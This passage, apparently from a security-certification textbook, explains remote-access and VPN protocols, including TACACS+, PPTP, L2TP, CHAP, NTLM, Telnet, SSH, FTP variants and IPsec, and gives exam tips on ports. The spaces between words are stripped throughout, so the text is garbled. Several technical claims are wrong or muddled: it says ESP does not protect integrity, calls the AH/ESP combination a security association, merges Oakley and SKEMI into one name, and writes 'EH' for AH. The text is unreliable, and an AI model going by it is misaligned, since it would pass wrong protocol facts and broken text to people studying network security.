REQUESTandRESPONSE.TheauthorizationprocessisperformedusinganauthorizationsessionconsistingofasinglepairofREQUESTandRESPONSEmessages.TheclientissuesanauthorizationREQUESTmessagecontainingafixedsetoffieldsenumeratingtheauthenticityoftheuserorprocessrequestingpermissionandavariablesetoffieldsenumeratingtheservicesoroptionsforwhichauthorizationisbeingrequested.TheRESPONSEmessageinTACACS+isnotasimpleyesorno;itcan
alsoincludequalifyinginformation,suchasausertimelimitorIPrestrictions.Theselimitationshaveimportantuses,suchasenforcingtime
limitsonshellaccessorenforcingIPaccesslistrestrictionsforspecificuseraccounts.
TACACS+AccountingAswiththetwopreviousservices,accountingisalsoanoptionalfunctionofTACACS+.Whenutilized,ittypicallyfollowstheotherservices.AccountinginTACACS+isdefinedastheprocessofrecordingwhatauserorprocesshasdone.Accountingcanservetwoimportantpurposes:
Itcanbeusedtoaccountforservicesbeingutilized,possiblyforbillingpurposes.
Itcanbeusedforgeneratingsecurityaudittrails.
TACACS+accountingrecordscontainseveralpiecesofinformationtosupportthesetasks.Theaccountingprocesshastheinformationrevealedintheauthorizationandauthenticationprocesses,soitcanrecordspecificrequestsbyuserorprocess.Tosupportthisfunctionality,TACACS+hasthreetypesofaccountingrecords:START,STOP,andUPDATE.Notethatthesearerecordtypes,notmessagetypesasearlierdiscussed.
AuthenticationProtocolsNumerousauthenticationprotocolshavebeendeveloped,used,anddiscardedinthebriefhistoryofcomputing.Somehavecomeandgonebecausetheydidnotenjoymarketshare,othershavehadsecurityissues,andyetothershavebeenrevisedandimprovedinnewerversions.Althoughit’simpossibleandimpracticaltocoverthemall,someofthecommononesfollow.
L2TPandPPTPLayer2TunnelingProtocol(L2TP)andPoint-to-PointTunnelingProtocol(PPTP)arebothOSILayer2tunnelingprotocols.Tunnelingistheencapsulationofonepacketwithinanother,whichallowsyoutohidethe
originalpacketfromvieworchangethenatureofthenetworktransport.Thiscanbedoneforbothsecurityandpracticalreasons.Fromapracticalperspective,assumethatyouareusingTCP/IPto
communicatebetweentwomachines.Yourmessagemaypassovervariousnetworks,suchasanAsynchronousTransferMode(ATM)network,asitmovesfromsourcetodestination.AstheATMprotocolcanneitherreadnorunderstandTCP/IPpackets,somethingmustbedonetomakethempassableacrossthenetwork.Byencapsulatingapacketasthepayloadinaseparateprotocol,soitcanbecarriedacrossasectionofanetwork,amechanismcalledatunneliscreated.Ateachendofthetunnel,calledthetunnelendpoints,thepayloadpacketisreadandunderstood.Asitgoesintothetunnel,youcanenvisionyourpacketbeingplacedinanenvelopewiththeaddressoftheappropriatetunnelendpointontheenvelope.Whentheenvelopearrivesatthetunnelendpoint,theoriginalmessage(thetunnelpacket’spayload)isre-created,read,andsenttoitsappropriatenextstop.Theinformationbeingtunneledisunderstoodonlyatthetunnelendpoints;itisnotrelevanttointermediatetunnelpointsbecauseitisonlyapayload.
PPPPoint-to-PointProtocol(PPP)isanolder,stillwidelyusedprotocolforestablishingdial-inconnectionsoverseriallinesorIntegratedServicesDigitalNetwork(ISDN)services.PPPhasseveralauthenticationmechanisms,includingPAP,CHAP,andtheExtensibleAuthenticationProtocol(EAP).Theseprotocolsareusedtoauthenticatethepeerdevice,notauserofthesystem.PPPisastandardizedInternetencapsulationofIPtrafficoverpoint-to-pointlinks,suchasseriallines.Theauthenticationprocessisperformedonlywhenthelinkisestablished.
TechTip
PPPFunctionsandAuthentication
PPPsupportsthreefunctions:
Encapsulatedatagramsacrossseriallinks
Establish,configure,andtestlinksusingLCPEstablishandconfiguredifferentnetworkprotocolsusingNCP
PPPsupportstwoauthenticationprotocols:
PasswordAuthenticationProtocol(PAP)
Challenge-HandshakeAuthenticationProtocol(CHAP)
PPTPMicrosoftledaconsortiumofnetworkingcompaniestoextendPPPtoenablethecreationofvirtualprivatenetworks(VPNs).TheresultwasthePoint-to-PointTunneling(PPTP),anetworkprotocolthatenablesthesecuretransferofdatafromaremotePCtoaserverbycreatingaVPNacrossaTCP/IPnetwork.Thisremotenetworkconnectioncanalsospanapublicswitchedtelephonenetwork(PSTN)andisthusaneconomicalwayofconnectingremotedial-inuserstoacorporatedatanetwork.TheincorporationofPPTPintotheMicrosoftWindowsproductlineprovidesabuilt-insecuremethodofremoteconnectionusingtheoperatingsystem,andthishasgivenPPTPalargemarketplacefootprint.FormostPPTPimplementations,threecomputersareinvolved:the
PPTPclient,theNAS,andaPPTPserver,asshowninFigure11.20.Theconnectionbetweentheremoteclientandthenetworkisestablishedinstages,asillustratedinFigure11.21.FirsttheclientmakesaPPPconnectiontoaNAS,typicallyanISP.(Intoday’sworldofwidelyavailablebroadband,ifthereisalreadyanInternetconnection,thenthereisnoneedtoperformthePPPconnectiontotheISP.)OncethePPPconnectionisestablished,asecondconnectionismadeoverthePPPconnectiontothePPTPserver.ThissecondconnectioncreatestheVPNconnectionbetweentheremoteclientandthePPTPserver.AtypicalVPNconnectionisoneinwhichtheuserisinahotelwithawirelessInternetconnection,connectingtoacorporatenetwork.Thisconnectionactsasa
tunnelforfuturedatatransfers.Althoughthesediagramsillustrateatelephoneconnection,thisfirstlinkcanbevirtuallyanymethod.CommoninhotelstodayarewiredconnectionstotheInternet.ThesewiredconnectionstypicallyareprovidedbyalocalISPandofferthesameservicesasaphoneconnection,albeitatamuchhigherdatatransferrate.
•Figure11.20PPTPcommunicationdiagram
•Figure11.21PPTPmessageencapsulationduringtransmission
PPTPestablishesatunnelfromtheremotePPTPclienttothePPTPserverandenablesencryptionwithinthistunnel.Thisprovidesasecuremethodoftransport.Todothisandstillenablerouting,anintermediateaddressingscheme,GenericRoutingEncapsulation(GRE),isused.Toestablishtheconnection,PPTPusescommunicationsacrossTCP
port1723(seeTable11.2inthe“ConnectionSummary”sectionattheendofthechapter),sothisportmustremainopenacrossthenetworkfirewallsforPPTPtobeinitiated.AlthoughPPTPallowstheuseofanyPPP
authenticationscheme,CHAPisusedwhenencryptionisspecified,toprovideanappropriatelevelofsecurity.Fortheencryptionmethodology,MicrosoftchosetheRSARC4cipher,witheithera40-or128-bitsessionkeylength,andthisisOSdriven.MicrosoftPoint-to-PointEncryption(MPPE)isanextensiontoPPPthatenablesVPNstousePPTPasthetunnelingprotocol.
EAPExtensibleAuthenticationProtocol(EAP)isauniversalauthenticationframeworkdefinedbyRFC3748thatisfrequentlyusedinwirelessnetworksandpoint-to-pointconnections.AlthoughEAPisnotlimitedtowirelessandcanbeusedforwiredauthentication,itismostoftenusedinwirelessLANs.EAPisdiscussedindetailinChapter12.
CHAPChallenge-HandshakeAuthenticationProtocol(CHAP)isusedtoprovideauthenticationacrossapoint-to-pointlinkusingPPP.Inthisprotocol,authenticationafterthelinkhasbeenestablishedisnotmandatory.CHAPisdesignedtoprovideauthenticationperiodicallythroughtheuseofachallenge/responsesystemthatissometimesdescribedasathree-wayhandshake,asillustratedinFigure11.22.Theinitialchallenge(arandomlygeneratednumber)issenttotheclient.Theclientusesaone-wayhashingfunctiontocalculatewhattheresponseshouldbeandthensendsthisback.Theservercomparestheresponsetowhatitcalculatedtheresponseshouldbe.Iftheymatch,communicationcontinues.Ifthetwovaluesdon’tmatch,thentheconnectionisterminated.Thismechanismreliesonasharedsecretbetweenthetwoentitiessothatthecorrectvaluescanbecalculated.MicrosofthascreatedtwoversionsofCHAP,modifiedtoincreasetheusabilityofCHAPacrossMicrosoft’sproductline.MSCHAPv1,definedinRFC2433,hasbeendeprecatedandwasdroppedinWindowsVista.Thecurrentstandard,version2,definedinRFC2759,wasintroducedwithWindows2000.
•Figure11.22TheCHAPchallenge/responsesequence
NTLMNTLANManager(NTLM)isanauthenticationprotocoldesignedbyMicrosoft,forusewiththeServerMessageBlock(SMB)protocol.SMBisanapplication-levelnetworkprotocolprimarilyusedforsharingoffilesandprintersinWindows-basednetworks.NTLMwasdesignedasareplacementfortheLANMANprotocol.ThecurrentversionisNTLMv2,whichwasintroducedwithWindowsNT4.0SP4.AlthoughMicrosofthasadoptedtheKerberosprotocolforauthentication,NTLMv2isstillusedwhen
AuthenticatingtoaserverusinganIPaddress
AuthenticatingtoaserverthatbelongstoadifferentActiveDirectoryforest
Authenticatingtoaserverthatdoesn’tbelongtoadomain
NoActiveDirectorydomainexists(“workgroup”or“peer-to-peer”connection)
PAPPasswordAuthenticationProtocol(PAP)involvesatwo-wayhandshakein
whichtheusernameandpasswordaresentacrossthelinkincleartext.PAPauthenticationdoesnotprovideanyprotectionagainstplaybackandlinesniffing.PAPisnowadeprecatedstandard.
L2TPLayer2TunnelingProtocol(L2TP)isalsoanInternetstandardandcamefromtheLayer2Forwarding(L2F)protocol,aCiscoinitiativedesignedtoaddressissueswithPPTP.WhereasPPTPisdesignedaroundPPPandIPnetworks,L2F,andhenceL2TP,isdesignedforuseacrossallkindsofnetworks,includingATMandFrameRelay.Additionally,whereasPPTPisdesignedtobeimplementedinsoftwareattheclientdevice,L2TPwasconceivedasahardwareimplementationusingarouteroraspecial-purposeappliance.L2TPcanbeconfiguredinsoftwareandisinMicrosoft’sRRASservers,whichuseL2TPtocreateaVPN.L2TPworksinmuchthesamewayasPPTP,butitopensupseveral
itemsforexpansion.Forinstance,inL2TP,routerscanbeenabledtoconcentrateVPNtrafficoverhigher-bandwidthlines,creatinghierarchicalnetworksofVPNtrafficthatcanbemoreefficientlymanagedacrossanenterprise.L2TPalsohastheabilitytouseIPsecandDataEncryptionStandard(DES)asencryptionprotocols,providingahigherlevelofdatasecurity.L2TPisalsodesignedtoworkwithestablishedAAAservicessuchasRADIUSandTACACS+toaidinuserauthentication,authorization,andaccounting.L2TPisestablishedviaUDPport1701,sothisisanessentialportto
leaveopenacrossfirewallssupportingL2TPtraffic.MicrosoftsupportsL2TPinWindows2000andabove,butbecauseofthecomputingpowerrequired,mostimplementationswillusespecializedhardware(suchasaCiscorouter).
TelnetOneofthemethodstograntremoteaccesstoasystemisthroughTelnet.Telnetisthestandardterminal-emulationprotocolwithintheTCP/IP
protocolseries,anditisdefinedinRFC854.Telnetallowsuserstologinremotelyandaccessresourcesasiftheuserhadalocalterminalconnection.Telnetisanoldprotocolandofferslittlesecurity.Information,includingaccountnamesandpasswords,ispassedincleartextovertheTCP/IPconnection.
ExamTip:TelnetusesTCPport23.Besuretomemorizethecommonportsusedbycommonservicesfortheexam.
TelnetmakesitsconnectionusingTCPport23.AsTelnetisimplementedonmostproductsusingTCP/IP,itisimportanttocontrolaccesstoTelnetonmachinesandrouterswhensettingthemup.Failuretocontrolaccessbyusingfirewalls,accesslists,andothersecuritymethods,orevenbydisablingtheTelnetdaemon,isequivalenttoleavinganopendoorforunauthorizedusersonasystem.
SSHSecureShell(SSH)isaprotocolseriesdesignedtofacilitatesecurenetworkfunctionsacrossaninsecurenetwork.SSHprovidesdirectsupportforsecureremotelogin,securefiletransfer,andsecureforwardingofTCP/IPandXWindowSystemtraffic.AnSSHconnectionisanencryptedchannel,providingforconfidentialityandintegrityprotection.SSHhasitsoriginsasareplacementfortheinsecureTelnetapplication
fromtheUNIXoperatingsystem.AnoriginalcomponentofUNIX,Telnetalloweduserstoconnectbetweensystems.AlthoughTelnetisstillusedtoday,ithassomedrawbacks,asdiscussedintheprecedingsection.SomeenterprisingUniversityofCalifornia,Berkeley,studentssubsequentlydevelopedther-commands,suchasrlogin,topermitaccessbasedontheuserandsourcesystem,asopposedtopassingpasswords.Thiswasnotperfecteither,however,becausewhenaloginwasrequired,itwasstillpassedintheclear.ThisledtothedevelopmentoftheSSHprotocolseries,
designedtoeliminatealloftheinsecuritiesassociatedwithTelnet,r-commands,andothermeansofremoteaccess.
ExamTip:SSHusesTCPport22.SCP(securecopy)andSFTP(secureFTP)useSSH,soeachalsousesTCPport22.
SSHopensasecuretransportchannelbetweenmachinesbyusinganSSHdaemononeachend.ThesedaemonsinitiatecontactoverTCPport22andthencommunicateoverhigherportsinasecuremode.OneofthestrengthsofSSHisitssupportformanydifferentencryptionprotocols.SSH1.0startedwithRSAalgorithms,butatthetimetheywerestillunderpatent,andthisledtoSSH2.0withextendedsupportforTripleDES(3DES)andotherencryptionmethods.Today,SSHcanbeusedwithawiderangeofencryptionprotocols,includingRSA,3DES,Blowfish,InternationalDataEncryptionAlgorithm(IDEA),CAST128,AES256,andothers.TheSSHprotocolhasfacilitiestoencryptdataautomatically,provide
authentication,andcompressdataintransit.Itcansupportstrongencryption,cryptographichostauthentication,andintegrityprotection.Theauthenticationservicesarehost-basedandnotuser-based.Ifuserauthenticationisdesiredinasystem,itmustbesetupseparatelyatahigherlevelintheOSImodel.Theprotocolisdesignedtobeflexibleandsimple,anditisdesignedspecificallytominimizethenumberofround-tripsbetweensystems.Thekeyexchange,publickey,symmetrickey,messageauthentication,andhashalgorithmsareallnegotiatedatconnectiontime.Individualdata-packetintegrityisassuredthroughtheuseofamessageauthenticationcodethatiscomputedfromasharedsecret,thecontentsofthepacket,andthepacketsequencenumber.TheSSHprotocolconsistsofthreemajorcomponents:
TransportlayerprotocolProvidesserverauthentication,
confidentiality,integrity,andcompression
UserauthenticationprotocolAuthenticatestheclienttotheserverConnectionprotocolProvidesmultiplexingoftheencryptedtunnelintoseverallogicalchannels
SSHisverypopularintheUNIXenvironment,anditisactivelyusedasamethodofestablishingVPNsacrosspublicnetworks.BecauseallcommunicationsbetweenthetwomachinesareencryptedattheOSIapplicationlayerbythetwoSSHdaemons,thisleadstotheabilitytobuildverysecuresolutionsandevensolutionsthatdefytheabilityofoutsideservicestomonitor.AsSSHisastandardprotocolserieswithconnectionparametersestablishedviaTCPport22,differentvendorscanbuilddifferingsolutionsthatcanstillinteroperate.
TechTip
RDPRemoteDesktopProtocol(RDP)isaproprietaryMicrosoftprotocoldesignedtoprovideagraphicalconnectiontoanothercomputer.ThecomputerrequestingtheconnectionhasRDPclientsoftware(builtintoWindows),andthetargetusesanRDPserver.ThissoftwarehasbeenavailableformanyversionsofWindowsandwasformerlycalledTerminalServices.ClientandserverversionsalsoexistforLinuxplatforms.RDPusesTCPandUDPports3389,soifRDPisdesired,theseportsneedtobeopenonthefirewall.
AlthoughWindowsServerimplementationsofSSHexist,thishasnotbeenapopularprotocolintheWindowsenvironmentfromaserverperspective.ThedevelopmentofawidearrayofcommercialSSHclientsfortheWindowsplatformindicatesthemarketplacestrengthofinterconnectionfromdesktopPCstoUNIX-basedserversutilizingthisprotocol.
FTP/FTPS/SFTP
OneofthemethodsoftransferringfilesbetweenmachinesisthroughtheuseoftheFileTransferProtocol(FTP).FTPisaplaintextprotocolthatoperatesbycommunicatingoverTCPbetweenaclientandaserver.TheclientinitiatesatransferwithanFTPrequesttotheserver’sTCPport21.Thisisthecontrolconnection,andthisconnectionremainsopenoverthedurationofthefiletransfer.Theactualdatatransferoccursonanegotiateddatatransferport,typicallyahigh-orderportnumber.FTPwasnotdesignedtobeasecuremethodoftransferringfiles.Ifasecuremethodisdesired,thenusingFTPSorSFTPisbest.FTPSistheuseofFTPoveranSSL/TLSsecuredchannel.Thiscanbe
doneeitherinexplicitmode,whereanAUTHTLScommandisissued,orinimplicitmode,wherethetransferoccursoverTCPport990forthecontrolchannelandTCPport989forthedatachannel.SFTPisnotFTPperse,butratheracompletelyseparateSecureFileTransferProtocolasdefinedbyanIETFDraft,thelatestofwhich,version6,expiredinJuly2007,buthasbeenincorporatedintoproductsinthemarketplace.
ExamTip:FTPusesTCPport21asacontrolchannelandTCPport20asatypicalactivemodedataport,assomefirewallsaresettoblockportsabove1024.
ItisalsopossibletorunFTPoverSSH,aslaterversionsofSSHallowsecuringofchannelssuchastheFTPcontrolchannel;thishasalsobeenreferredtoasSecureFTP.Thisleavesthedatachannelunencrypted,aproblemthathasbeensolvedinversion3.0ofSSH,whichsupportsFTPcommands.ThechallengeofencryptingtheFTPdatacommunicationsisthatthemutualportagreementmustbeopenedonthefirewall,andforsecurityreasons,high-orderportsthatarenotexplicitlydefinedaretypicallysecured.Becauseofthischallenge,SecureCopy(SCP)isoftenamoredesirablealternativetoSFTPwhenusingSSH.
VPNsAvirtualprivatenetwork(VPN)isasecurevirtualnetworkbuiltontopofaphysicalnetwork.ThesecurityofaVPNliesintheencryptionofpacketcontentsbetweentheendpointsthatdefinetheVPN.ThephysicalnetworkuponwhichaVPNisbuiltistypicallyapublicnetwork,suchastheInternet.BecausethepacketcontentsbetweenVPNendpointsareencrypted,toanoutsideobserveronthepublicnetwork,thecommunicationissecure,anddependingonhowtheVPNissetup,securitycanevenextendtothetwocommunicatingparties’machines.Virtualprivatenetworkingisnotaprotocolperse,butratheramethod
ofusingprotocolstoachieveaspecificobjective—securecommunications—asshowninFigure11.23.Auserwhowantstohaveasecurecommunicationchannelwithaserveracrossapublicnetworkcansetuptwointermediarydevices,VPNendpoints,toaccomplishthistask.Theusercancommunicatewithhisendpoint,andtheservercancommunicatewithitsendpoint.Thetwoendpointsthencommunicateacrossthepublicnetwork.VPNendpointscanbesoftwaresolutions,routers,orspecificserverssetupforspecificfunctionality.ThisimpliesthatVPNservicesaresetupinadvanceandarenotsomethingnegotiatedon-the-fly.
•Figure11.23VPNserviceoveranInternetconnection
AtypicaluseofVPNservicesisauseraccessingacorporatedatanetworkfromahomePCacrosstheInternet.TheemployeeinstallsVPNsoftwarefromworkonahomePC.Thissoftwareisalreadyconfiguredtocommunicatewiththecorporatenetwork’sVPNendpoint;itknowsthelocation,theprotocolsthatwillbeused,andsoon.Whenthehomeuserwantstoconnecttothecorporatenetwork,sheconnectstotheInternetandthenstartstheVPNsoftware.Theusercanthenlogintothecorporatenetworkbyusinganappropriateauthenticationandauthorizationmethodology.ThesolepurposeoftheVPNconnectionistoprovideaprivateconnectionbetweenthemachines,whichencryptsanydatasentbetweenthehomeuser’sPCandthecorporatenetwork.Identification,authorization,andallotherstandardfunctionsareaccomplishedwiththestandardmechanismsfortheestablishedsystem.VPNscanusemanydifferentprotocolstoofferasecuremethodof
communicatingbetweenendpoints.Commonmethodsofencryptionon
VPNsincludePPTP,IPsec,SSH,andL2TP,allofwhicharediscussedinthischapter.Thekeyisthatbothendpointsknowtheprotocolandshareasecret.AllofthisnecessaryinformationisestablishedwhentheVPNissetup.Atthetimeofuse,theVPNonlyactsasaprivatetunnelbetweenthetwopointsanddoesnotconstituteacompletesecuritysolution.
IPsecInternetProtocolSecurity(IPsec)isasetofprotocolsdevelopedbytheIETFtosecurelyexchangepacketsatthenetworklayer(Layer3)oftheOSImodel(RFCs2401–2412).AlthoughtheseprotocolsworkonlyinconjunctionwithIPnetworks,onceanIPsecconnectionisestablished,itispossibletotunnelacrossothernetworksatlowerlevelsoftheOSImodel.ThesetofsecurityservicesprovidedbyIPsecoccursatthenetworklayeroftheOSImodel,sohigher-layerprotocols,suchasTCP,UDP,InternetControlMessageProtocol(ICMP),BorderGatewayProtocol(BGP),andthelike,arenotfunctionallyalteredbytheimplementationofIPsecservices.TheIPsecprotocolserieshasasweepingarrayofservicesitisdesigned
toprovide,includingbutnotlimitedtoaccesscontrol,connectionlessintegrity,traffic-flowconfidentiality,rejectionofreplayedpackets,datasecurity(encryption),anddata-originauthentication.IPsechastwodefinedmethods—transportandtunneling—thatprovidedifferentlevelsofsecurity.IPsecalsohasthreemodesofconnection:host-to-server,server-to-server,andhost-to-host.Thetransportmethodencryptsonlythedataportionofapacket,thus
enablinganoutsidertoseesourceanddestinationIPaddresses.Thetransportmethodprotectsthehigher-levelprotocolsassociatedwithapacketandprotectsthedatabeingtransmittedbutallowsknowledgeofthetransmissionitself.Protectionofthedataportionofapacketisreferredtoascontentprotection.
ExamTip:Intransportmode(end-to-end),securityofpackettrafficisprovidedbytheendpointcomputers.Intunnelmode(portal-to-portal),securityofpackettrafficisprovidedbetweenendpointnodemachinesineachnetworkandnotattheterminalhostmachines.
TunnelingprovidesencryptionofsourceanddestinationIPaddresses,aswellasofthedataitself.Thisprovidesthegreatestsecurity,butitcanbedoneonlybetweenIPsecservers(orrouters)becausethefinaldestinationneedstobeknownfordelivery.Protectionoftheheaderinformationisknownascontextprotection.Itispossibletousebothmethodsatthesametime,suchasusing
transportwithinone’sownnetworktoreachanIPsecserver,whichthentunnelstothetargetserver’snetwork,connectingtoanIPsecserverthere,andthenusingthetransportmethodfromthetargetnetwork’sIPsecservertothetargethost.
SecurityAssociationsAsecurityassociation(SA)isaformalmannerofdescribingthenecessaryandsufficientportionsoftheIPsecprotocolseriestoachieveaspecificlevelofprotection.Becausemanyoptionsexist,bothcommunicatingpartiesmustagreeontheuseoftheprotocolsthatareavailable,andthisagreementisreferredtoasasecurityassociation.SAsexistbothforintegrity-protectingsystemsandconfidentiality-protectingsystems.IneachIPsecimplementation,asecurityassociationdatabase(SAD)definesparametersassociatedwitheachSA.TheSAisaone-way(simplex)association,andiftwo-waycommunicationsecurityisdesired,twoSAsareused—oneforeachdirection.
ExamTip:Asecurityassociationisalogicalsetofsecurityparametersdesignedtofacilitatethe
sharingofinformationbetweenentities.
IPsecConfigurationsFourbasicconfigurationscanbeappliedtomachine-to-machineconnectionsusingIPsec.Thesimplestisahost-to-hostconnectionbetweentwomachines,asshowninFigure11.24.Inthiscase,theInternetisnotapartoftheSAbetweenthemachines.Ifbidirectionalsecurityisdesired,twoSAsareused.TheSAsareeffectivefromhosttohost.
•Figure11.24Ahost-to-hostconnectionbetweentwomachines
Thesecondcaseplacestwosecuritydevicesinthestream,relievingthehostsofthecalculationandencapsulationduties.ThesetwogatewayshaveanSAbetweenthem.Thenetworkisassumedtobesecurefromeach
machinetoitsgateway,andnoIPsecisperformedacrossthesehops.Figure11.25showsthetwosecuritygatewayswithatunnelacrosstheInternet,althougheithertunnelortransportmodecouldbeused.
•Figure11.25TwosecuritygatewayswithatunnelacrosstheInternet
Thethirdcasecombinesthefirsttwo.AseparateSAexistsbetweenthegatewaydevices,butanSAalsoexistsbetweenhosts.Thiscouldbeconsideredatunnelinsideatunnel,asshowninFigure11.26.
•Figure11.26Atunnelinsideatunnel
RemoteuserscommonlyconnectthroughtheInternettoanorganization’snetwork.Thenetworkhasasecuritygatewaythroughwhichitsecurestraffictoandfromitsserversandauthorizedusers.Inthelastcase,illustratedinFigure11.27,theuserestablishesanSAwiththesecuritygatewayandthenaseparateSAwiththedesiredserver,ifrequired.Thiscanbedoneusingsoftwareonaremotelaptopandhardwareattheorganization’snetwork.
•Figure11.27Tunnelfromhosttogateway
WindowscanactasanIPsecserver,ascanroutersandotherservers.TheprimaryissueisCPUusageandwherethecomputingpowershouldbeimplanted.ThisconsiderationhasledtotheriseofIPsecappliances,whicharehardwaredevicesthatperformtheIPsecfunctionspecificallyforaseriesofcommunications.Dependingonthenumberofconnections,networkbandwidth,andsoon,thesedevicescanbeinexpensiveforsmallofficeorhomeofficeuseorquiteexpensiveforlarge,enterprise-levelimplementations.
IPsecSecurity
IPsecusestwoprotocolstoprovidetrafficsecurity:
AuthenticationHeader(AH)Aheaderaddedtoapacketforthepurposesofintegritychecking
EncapsulatingSecurityPayload(ESP)Amethodofencryptingthedataportionofadatagramtoprovideconfidentiality
Forkeymanagementandexchange,threeprotocolsexist:
InternetSecurityAssociationandKeyManagementProtocol(ISAKMP)
OakleySecureKeyExchangeMechanismforInternet(SKEMI)
ThesekeymanagementprotocolscanbecollectivelyreferredtoasInternetKeyManagementProtocol(IKMP)orInternetKeyExchange(IKE).IPsecdoesnotdefinespecificsecurityalgorithms,nordoesitrequire
specificmethodsofimplementation.IPsecisanopenframeworkthatallowsvendorstoimplementexistingindustry-standardalgorithmssuitedforspecifictasks.ThisflexibilityiskeyinIPsec’sabilitytoofferawiderangeofsecurityfunctions.IPsecallowsseveralsecuritytechnologiestobecombinedintoacomprehensivesolutionfornetwork-basedconfidentiality,integrity,andauthentication.IPsecusesthefollowing:
ExamTip:IPsecAHprotectsintegrity,butitdoesnotprovideprivacy.IPsecESPprovidesconfidentiality,butitdoesnotprotectintegrityofthepacket.Tocoverbothprivacyandintegrity,bothheaderscanbeusedatthesametime.
Diffie-Hellmankeyexchangebetweenpeersonapublicnetwork
PublickeysigningofDiffie-Hellmankeyexchangestoguaranteeidentityandavoidman-in-the-middleattacks
Bulkencryptionalgorithms,suchasIDEAand3DES,forencryptingdata
Keyedhashalgorithms,suchasHMAC,andtraditionalhashalgorithms,suchasMD5andSHA-1,forpacket-levelauthentication
DigitalcertificatestoactasdigitalIDcardsbetweenparties
Toprovidetrafficsecurity,twoheaderextensionshavebeendefinedforIPdatagrams.TheAH,whenaddedtoanIPdatagram,ensurestheintegrityofthedataandalsotheauthenticityofthedata’sorigin.ByprotectingthenonchangingelementsintheIPheader,theAHprotectstheIPaddress,whichenablesdata-originauthentication.TheESPprovidessecurityservicesforthehigher-levelprotocolportionofthepacketonly,nottheIPheader.AHandESPcanbeusedseparatelyorincombination,dependingonthe
levelandtypesofsecuritydesired.BothalsoworkwiththetransportandtunnelmodesofIPsecprotocols.Intransportmode,thetwocommunicationendpointsprovidesecurityprimarilyfortheupper-layerprotocols.Thecryptographicendpoints,whereencryptionanddecryptionoccur,arelocatedatthesourceanddestinationofthecommunicationchannel.WhenAHisintransportmode,theoriginalIPheaderisexposed,butitscontentsareprotectedviatheAHblockinthepacket,asillustratedinFigure11.28.WhenAHisemployedintunnelmode,portionsoftheouterIPheaderaregiventhesameheaderprotectionthatoccursintransportmode,withtheentireinnerpacketreceivingprotection.ThisisillustratedinFigure11.29.Theuseoftunnelmodeallowseasiercrossingoffirewalls,forwithoutit,specificfirewallruleswouldbeneededtopassthemodifiedtransportpacketheader.
•Figure11.28IPsecuseofAHintransportmode
•Figure11.29IPsecuseofAHintunnelmode
Tunnelingisameansofencapsulatingpacketsinsideaprotocolthatisunderstoodonlyattheentryandexitpointsofthetunnel.Thisprovidessecurityduringtransportinthetunnel,becauseoutsideobserverscannot
decipherpacketcontentsoreventheidentitiesofthecommunicatingparties.IPsechasatunnelmodethatcanbeusedfromservertoserveracrossapublicnetwork.Althoughthetunnelendpointsarereferredtoasservers,thesedevicescanberouters,appliances,orservers.Intunnelmode,thetunnelendpointsmerelyencapsulatetheentirepacketwithnewIPheaderstoindicatetheendpoints,andtheyencryptthecontentsofthisnewpacket.ThetruesourceanddestinationinformationiscontainedintheinnerIPheader,whichisencryptedinthetunnel.TheouterIPheadercontainstheaddressesoftheendpointsofthetunnel.ESPprovidesameansofencryptingthepacket’scontents,asshownin
Figure11.30.Inthiscase,intransportmode,thedatagramcontentsareencryptedandauthenticatedviatheESPheaderandfooter/trailerthatareinsertedintothedatagram.Asmentioned,AHandESPcanbeemployedintunnelmode.ESPaffordsthesameencryptionprotectiontothecontentsofthetunneledpacket,whichistheentirepacketfromtheinitialsender,asillustratedinFigure11.31.Together,intunnelmode,AHandESPcanprovidecompleteprotectionacrossthepacket,asshowninFigure11.32.ThespecificcombinationofAHandESPisreferredtoasasecurityassociationinIPsec.
•Figure11.30IPsecuseofESPintransportmode
•Figure11.31IPsecuseofESPintunnelmode
•Figure11.32IPsecESPandAHpacketconstructionintunnelmode
InIPversion4(IPv4),IPsecisanadd-on,anditsacceptanceisvendordriven.ItisnotapartoftheoriginalIP—oneoftheshort-sighteddesignflawsoftheoriginalIP.InIPv6,IPsecisintegratedintoIPandisnativeonallpackets.Itsuseisstilloptional,butitsinclusionintheprotocolsuitewillguaranteeinteroperabilityacrossvendorsolutionswhentheyarecompliantwithIPv6standards.IPsecusescryptographickeysinitssecurityprocessandhasboth
manualandautomaticdistributionofkeysaspartoftheprotocolseries.Manualkeydistributionisincluded,butitispracticalonlyinsmall,staticenvironmentsanddoesnotscaletoenterprise-levelimplementations.Thedefaultmethodofkeymanagement,InternetKeyExchange(IKE),isautomated.IKEauthenticateseachpeerinvolvedinIPsecandnegotiatesthesecuritypolicy,includingtheexchangeofsessionkeys.IKEcreatesasecuretunnelbetweenpeersandthennegotiatesthesecurityassociation
forIPsecacrossthischannel.Thisisdoneintwophases:thefirstdevelopsthechannel,andtheseconddevelopsthesecurityassociation.Figure11.33illustratesthedifferentlevelsofprotectionofferedby
VPNsandIPsec.ThisshowstheadvantagesofIPsecanditsmorecomprehensivecoverage.
•Figure11.33Protectionfromdifferentlevelsofencryption
VulnerabilitiesofRemoteAccessMethods
Theprimaryvulnerabilityassociatedwithmanyofthesemethodsofremoteaccessisthepassingofcriticaldataincleartext.Plaintextpassingofpasswordsprovidesnosecurityifthepasswordissniffed,andsniffersareeasytouseonanetwork.EvenplaintextpassingofuserIDsgivesawayinformationthatcanbecorrelatedandpossiblyusedbyanattacker.PlaintextcredentialpassingisoneofthefundamentalflawswithTelnetandiswhySSHwasdeveloped.ThisisalsooneoftheflawswithRADIUSandTACACS+,astheyhaveasegmentunprotected.Therearemethodsforovercomingtheselimitations,althoughtheyrequiredisciplineandunderstandinginsettingupasystem.Thestrengthoftheencryptionalgorithmisalsoaconcern.Shoulda
specificalgorithmormethodprovetobevulnerable,servicesthatrelysolelyonitarealsovulnerable.Togetaroundthisdependency,manyoftheprotocolsallownumerousencryptionmethods,sothatshouldoneprovevulnerable,ashifttoanotherrestoressecurity.
TechTip
IPsecinaNutshellIPsechastwoprimarymodes,transportmodeandtunnelmode.Transportmodeissimplerandaddsfewerbytestoapacket,butcanhaveissuestransitingitemssuchasfirewalls.Tunnelingmoderesolvesthefirewallissuebytotalencapsulation.IPsechastwoprimarymechanisms,AHandESP.AHprovidesforauthenticationofdatagramcontents,butnoprotectionintheformofsecrecy.ESPencryptsthedatagram,providingsecrecy,andwhenusedwithEH,ESPprovidesauthenticationaswell.
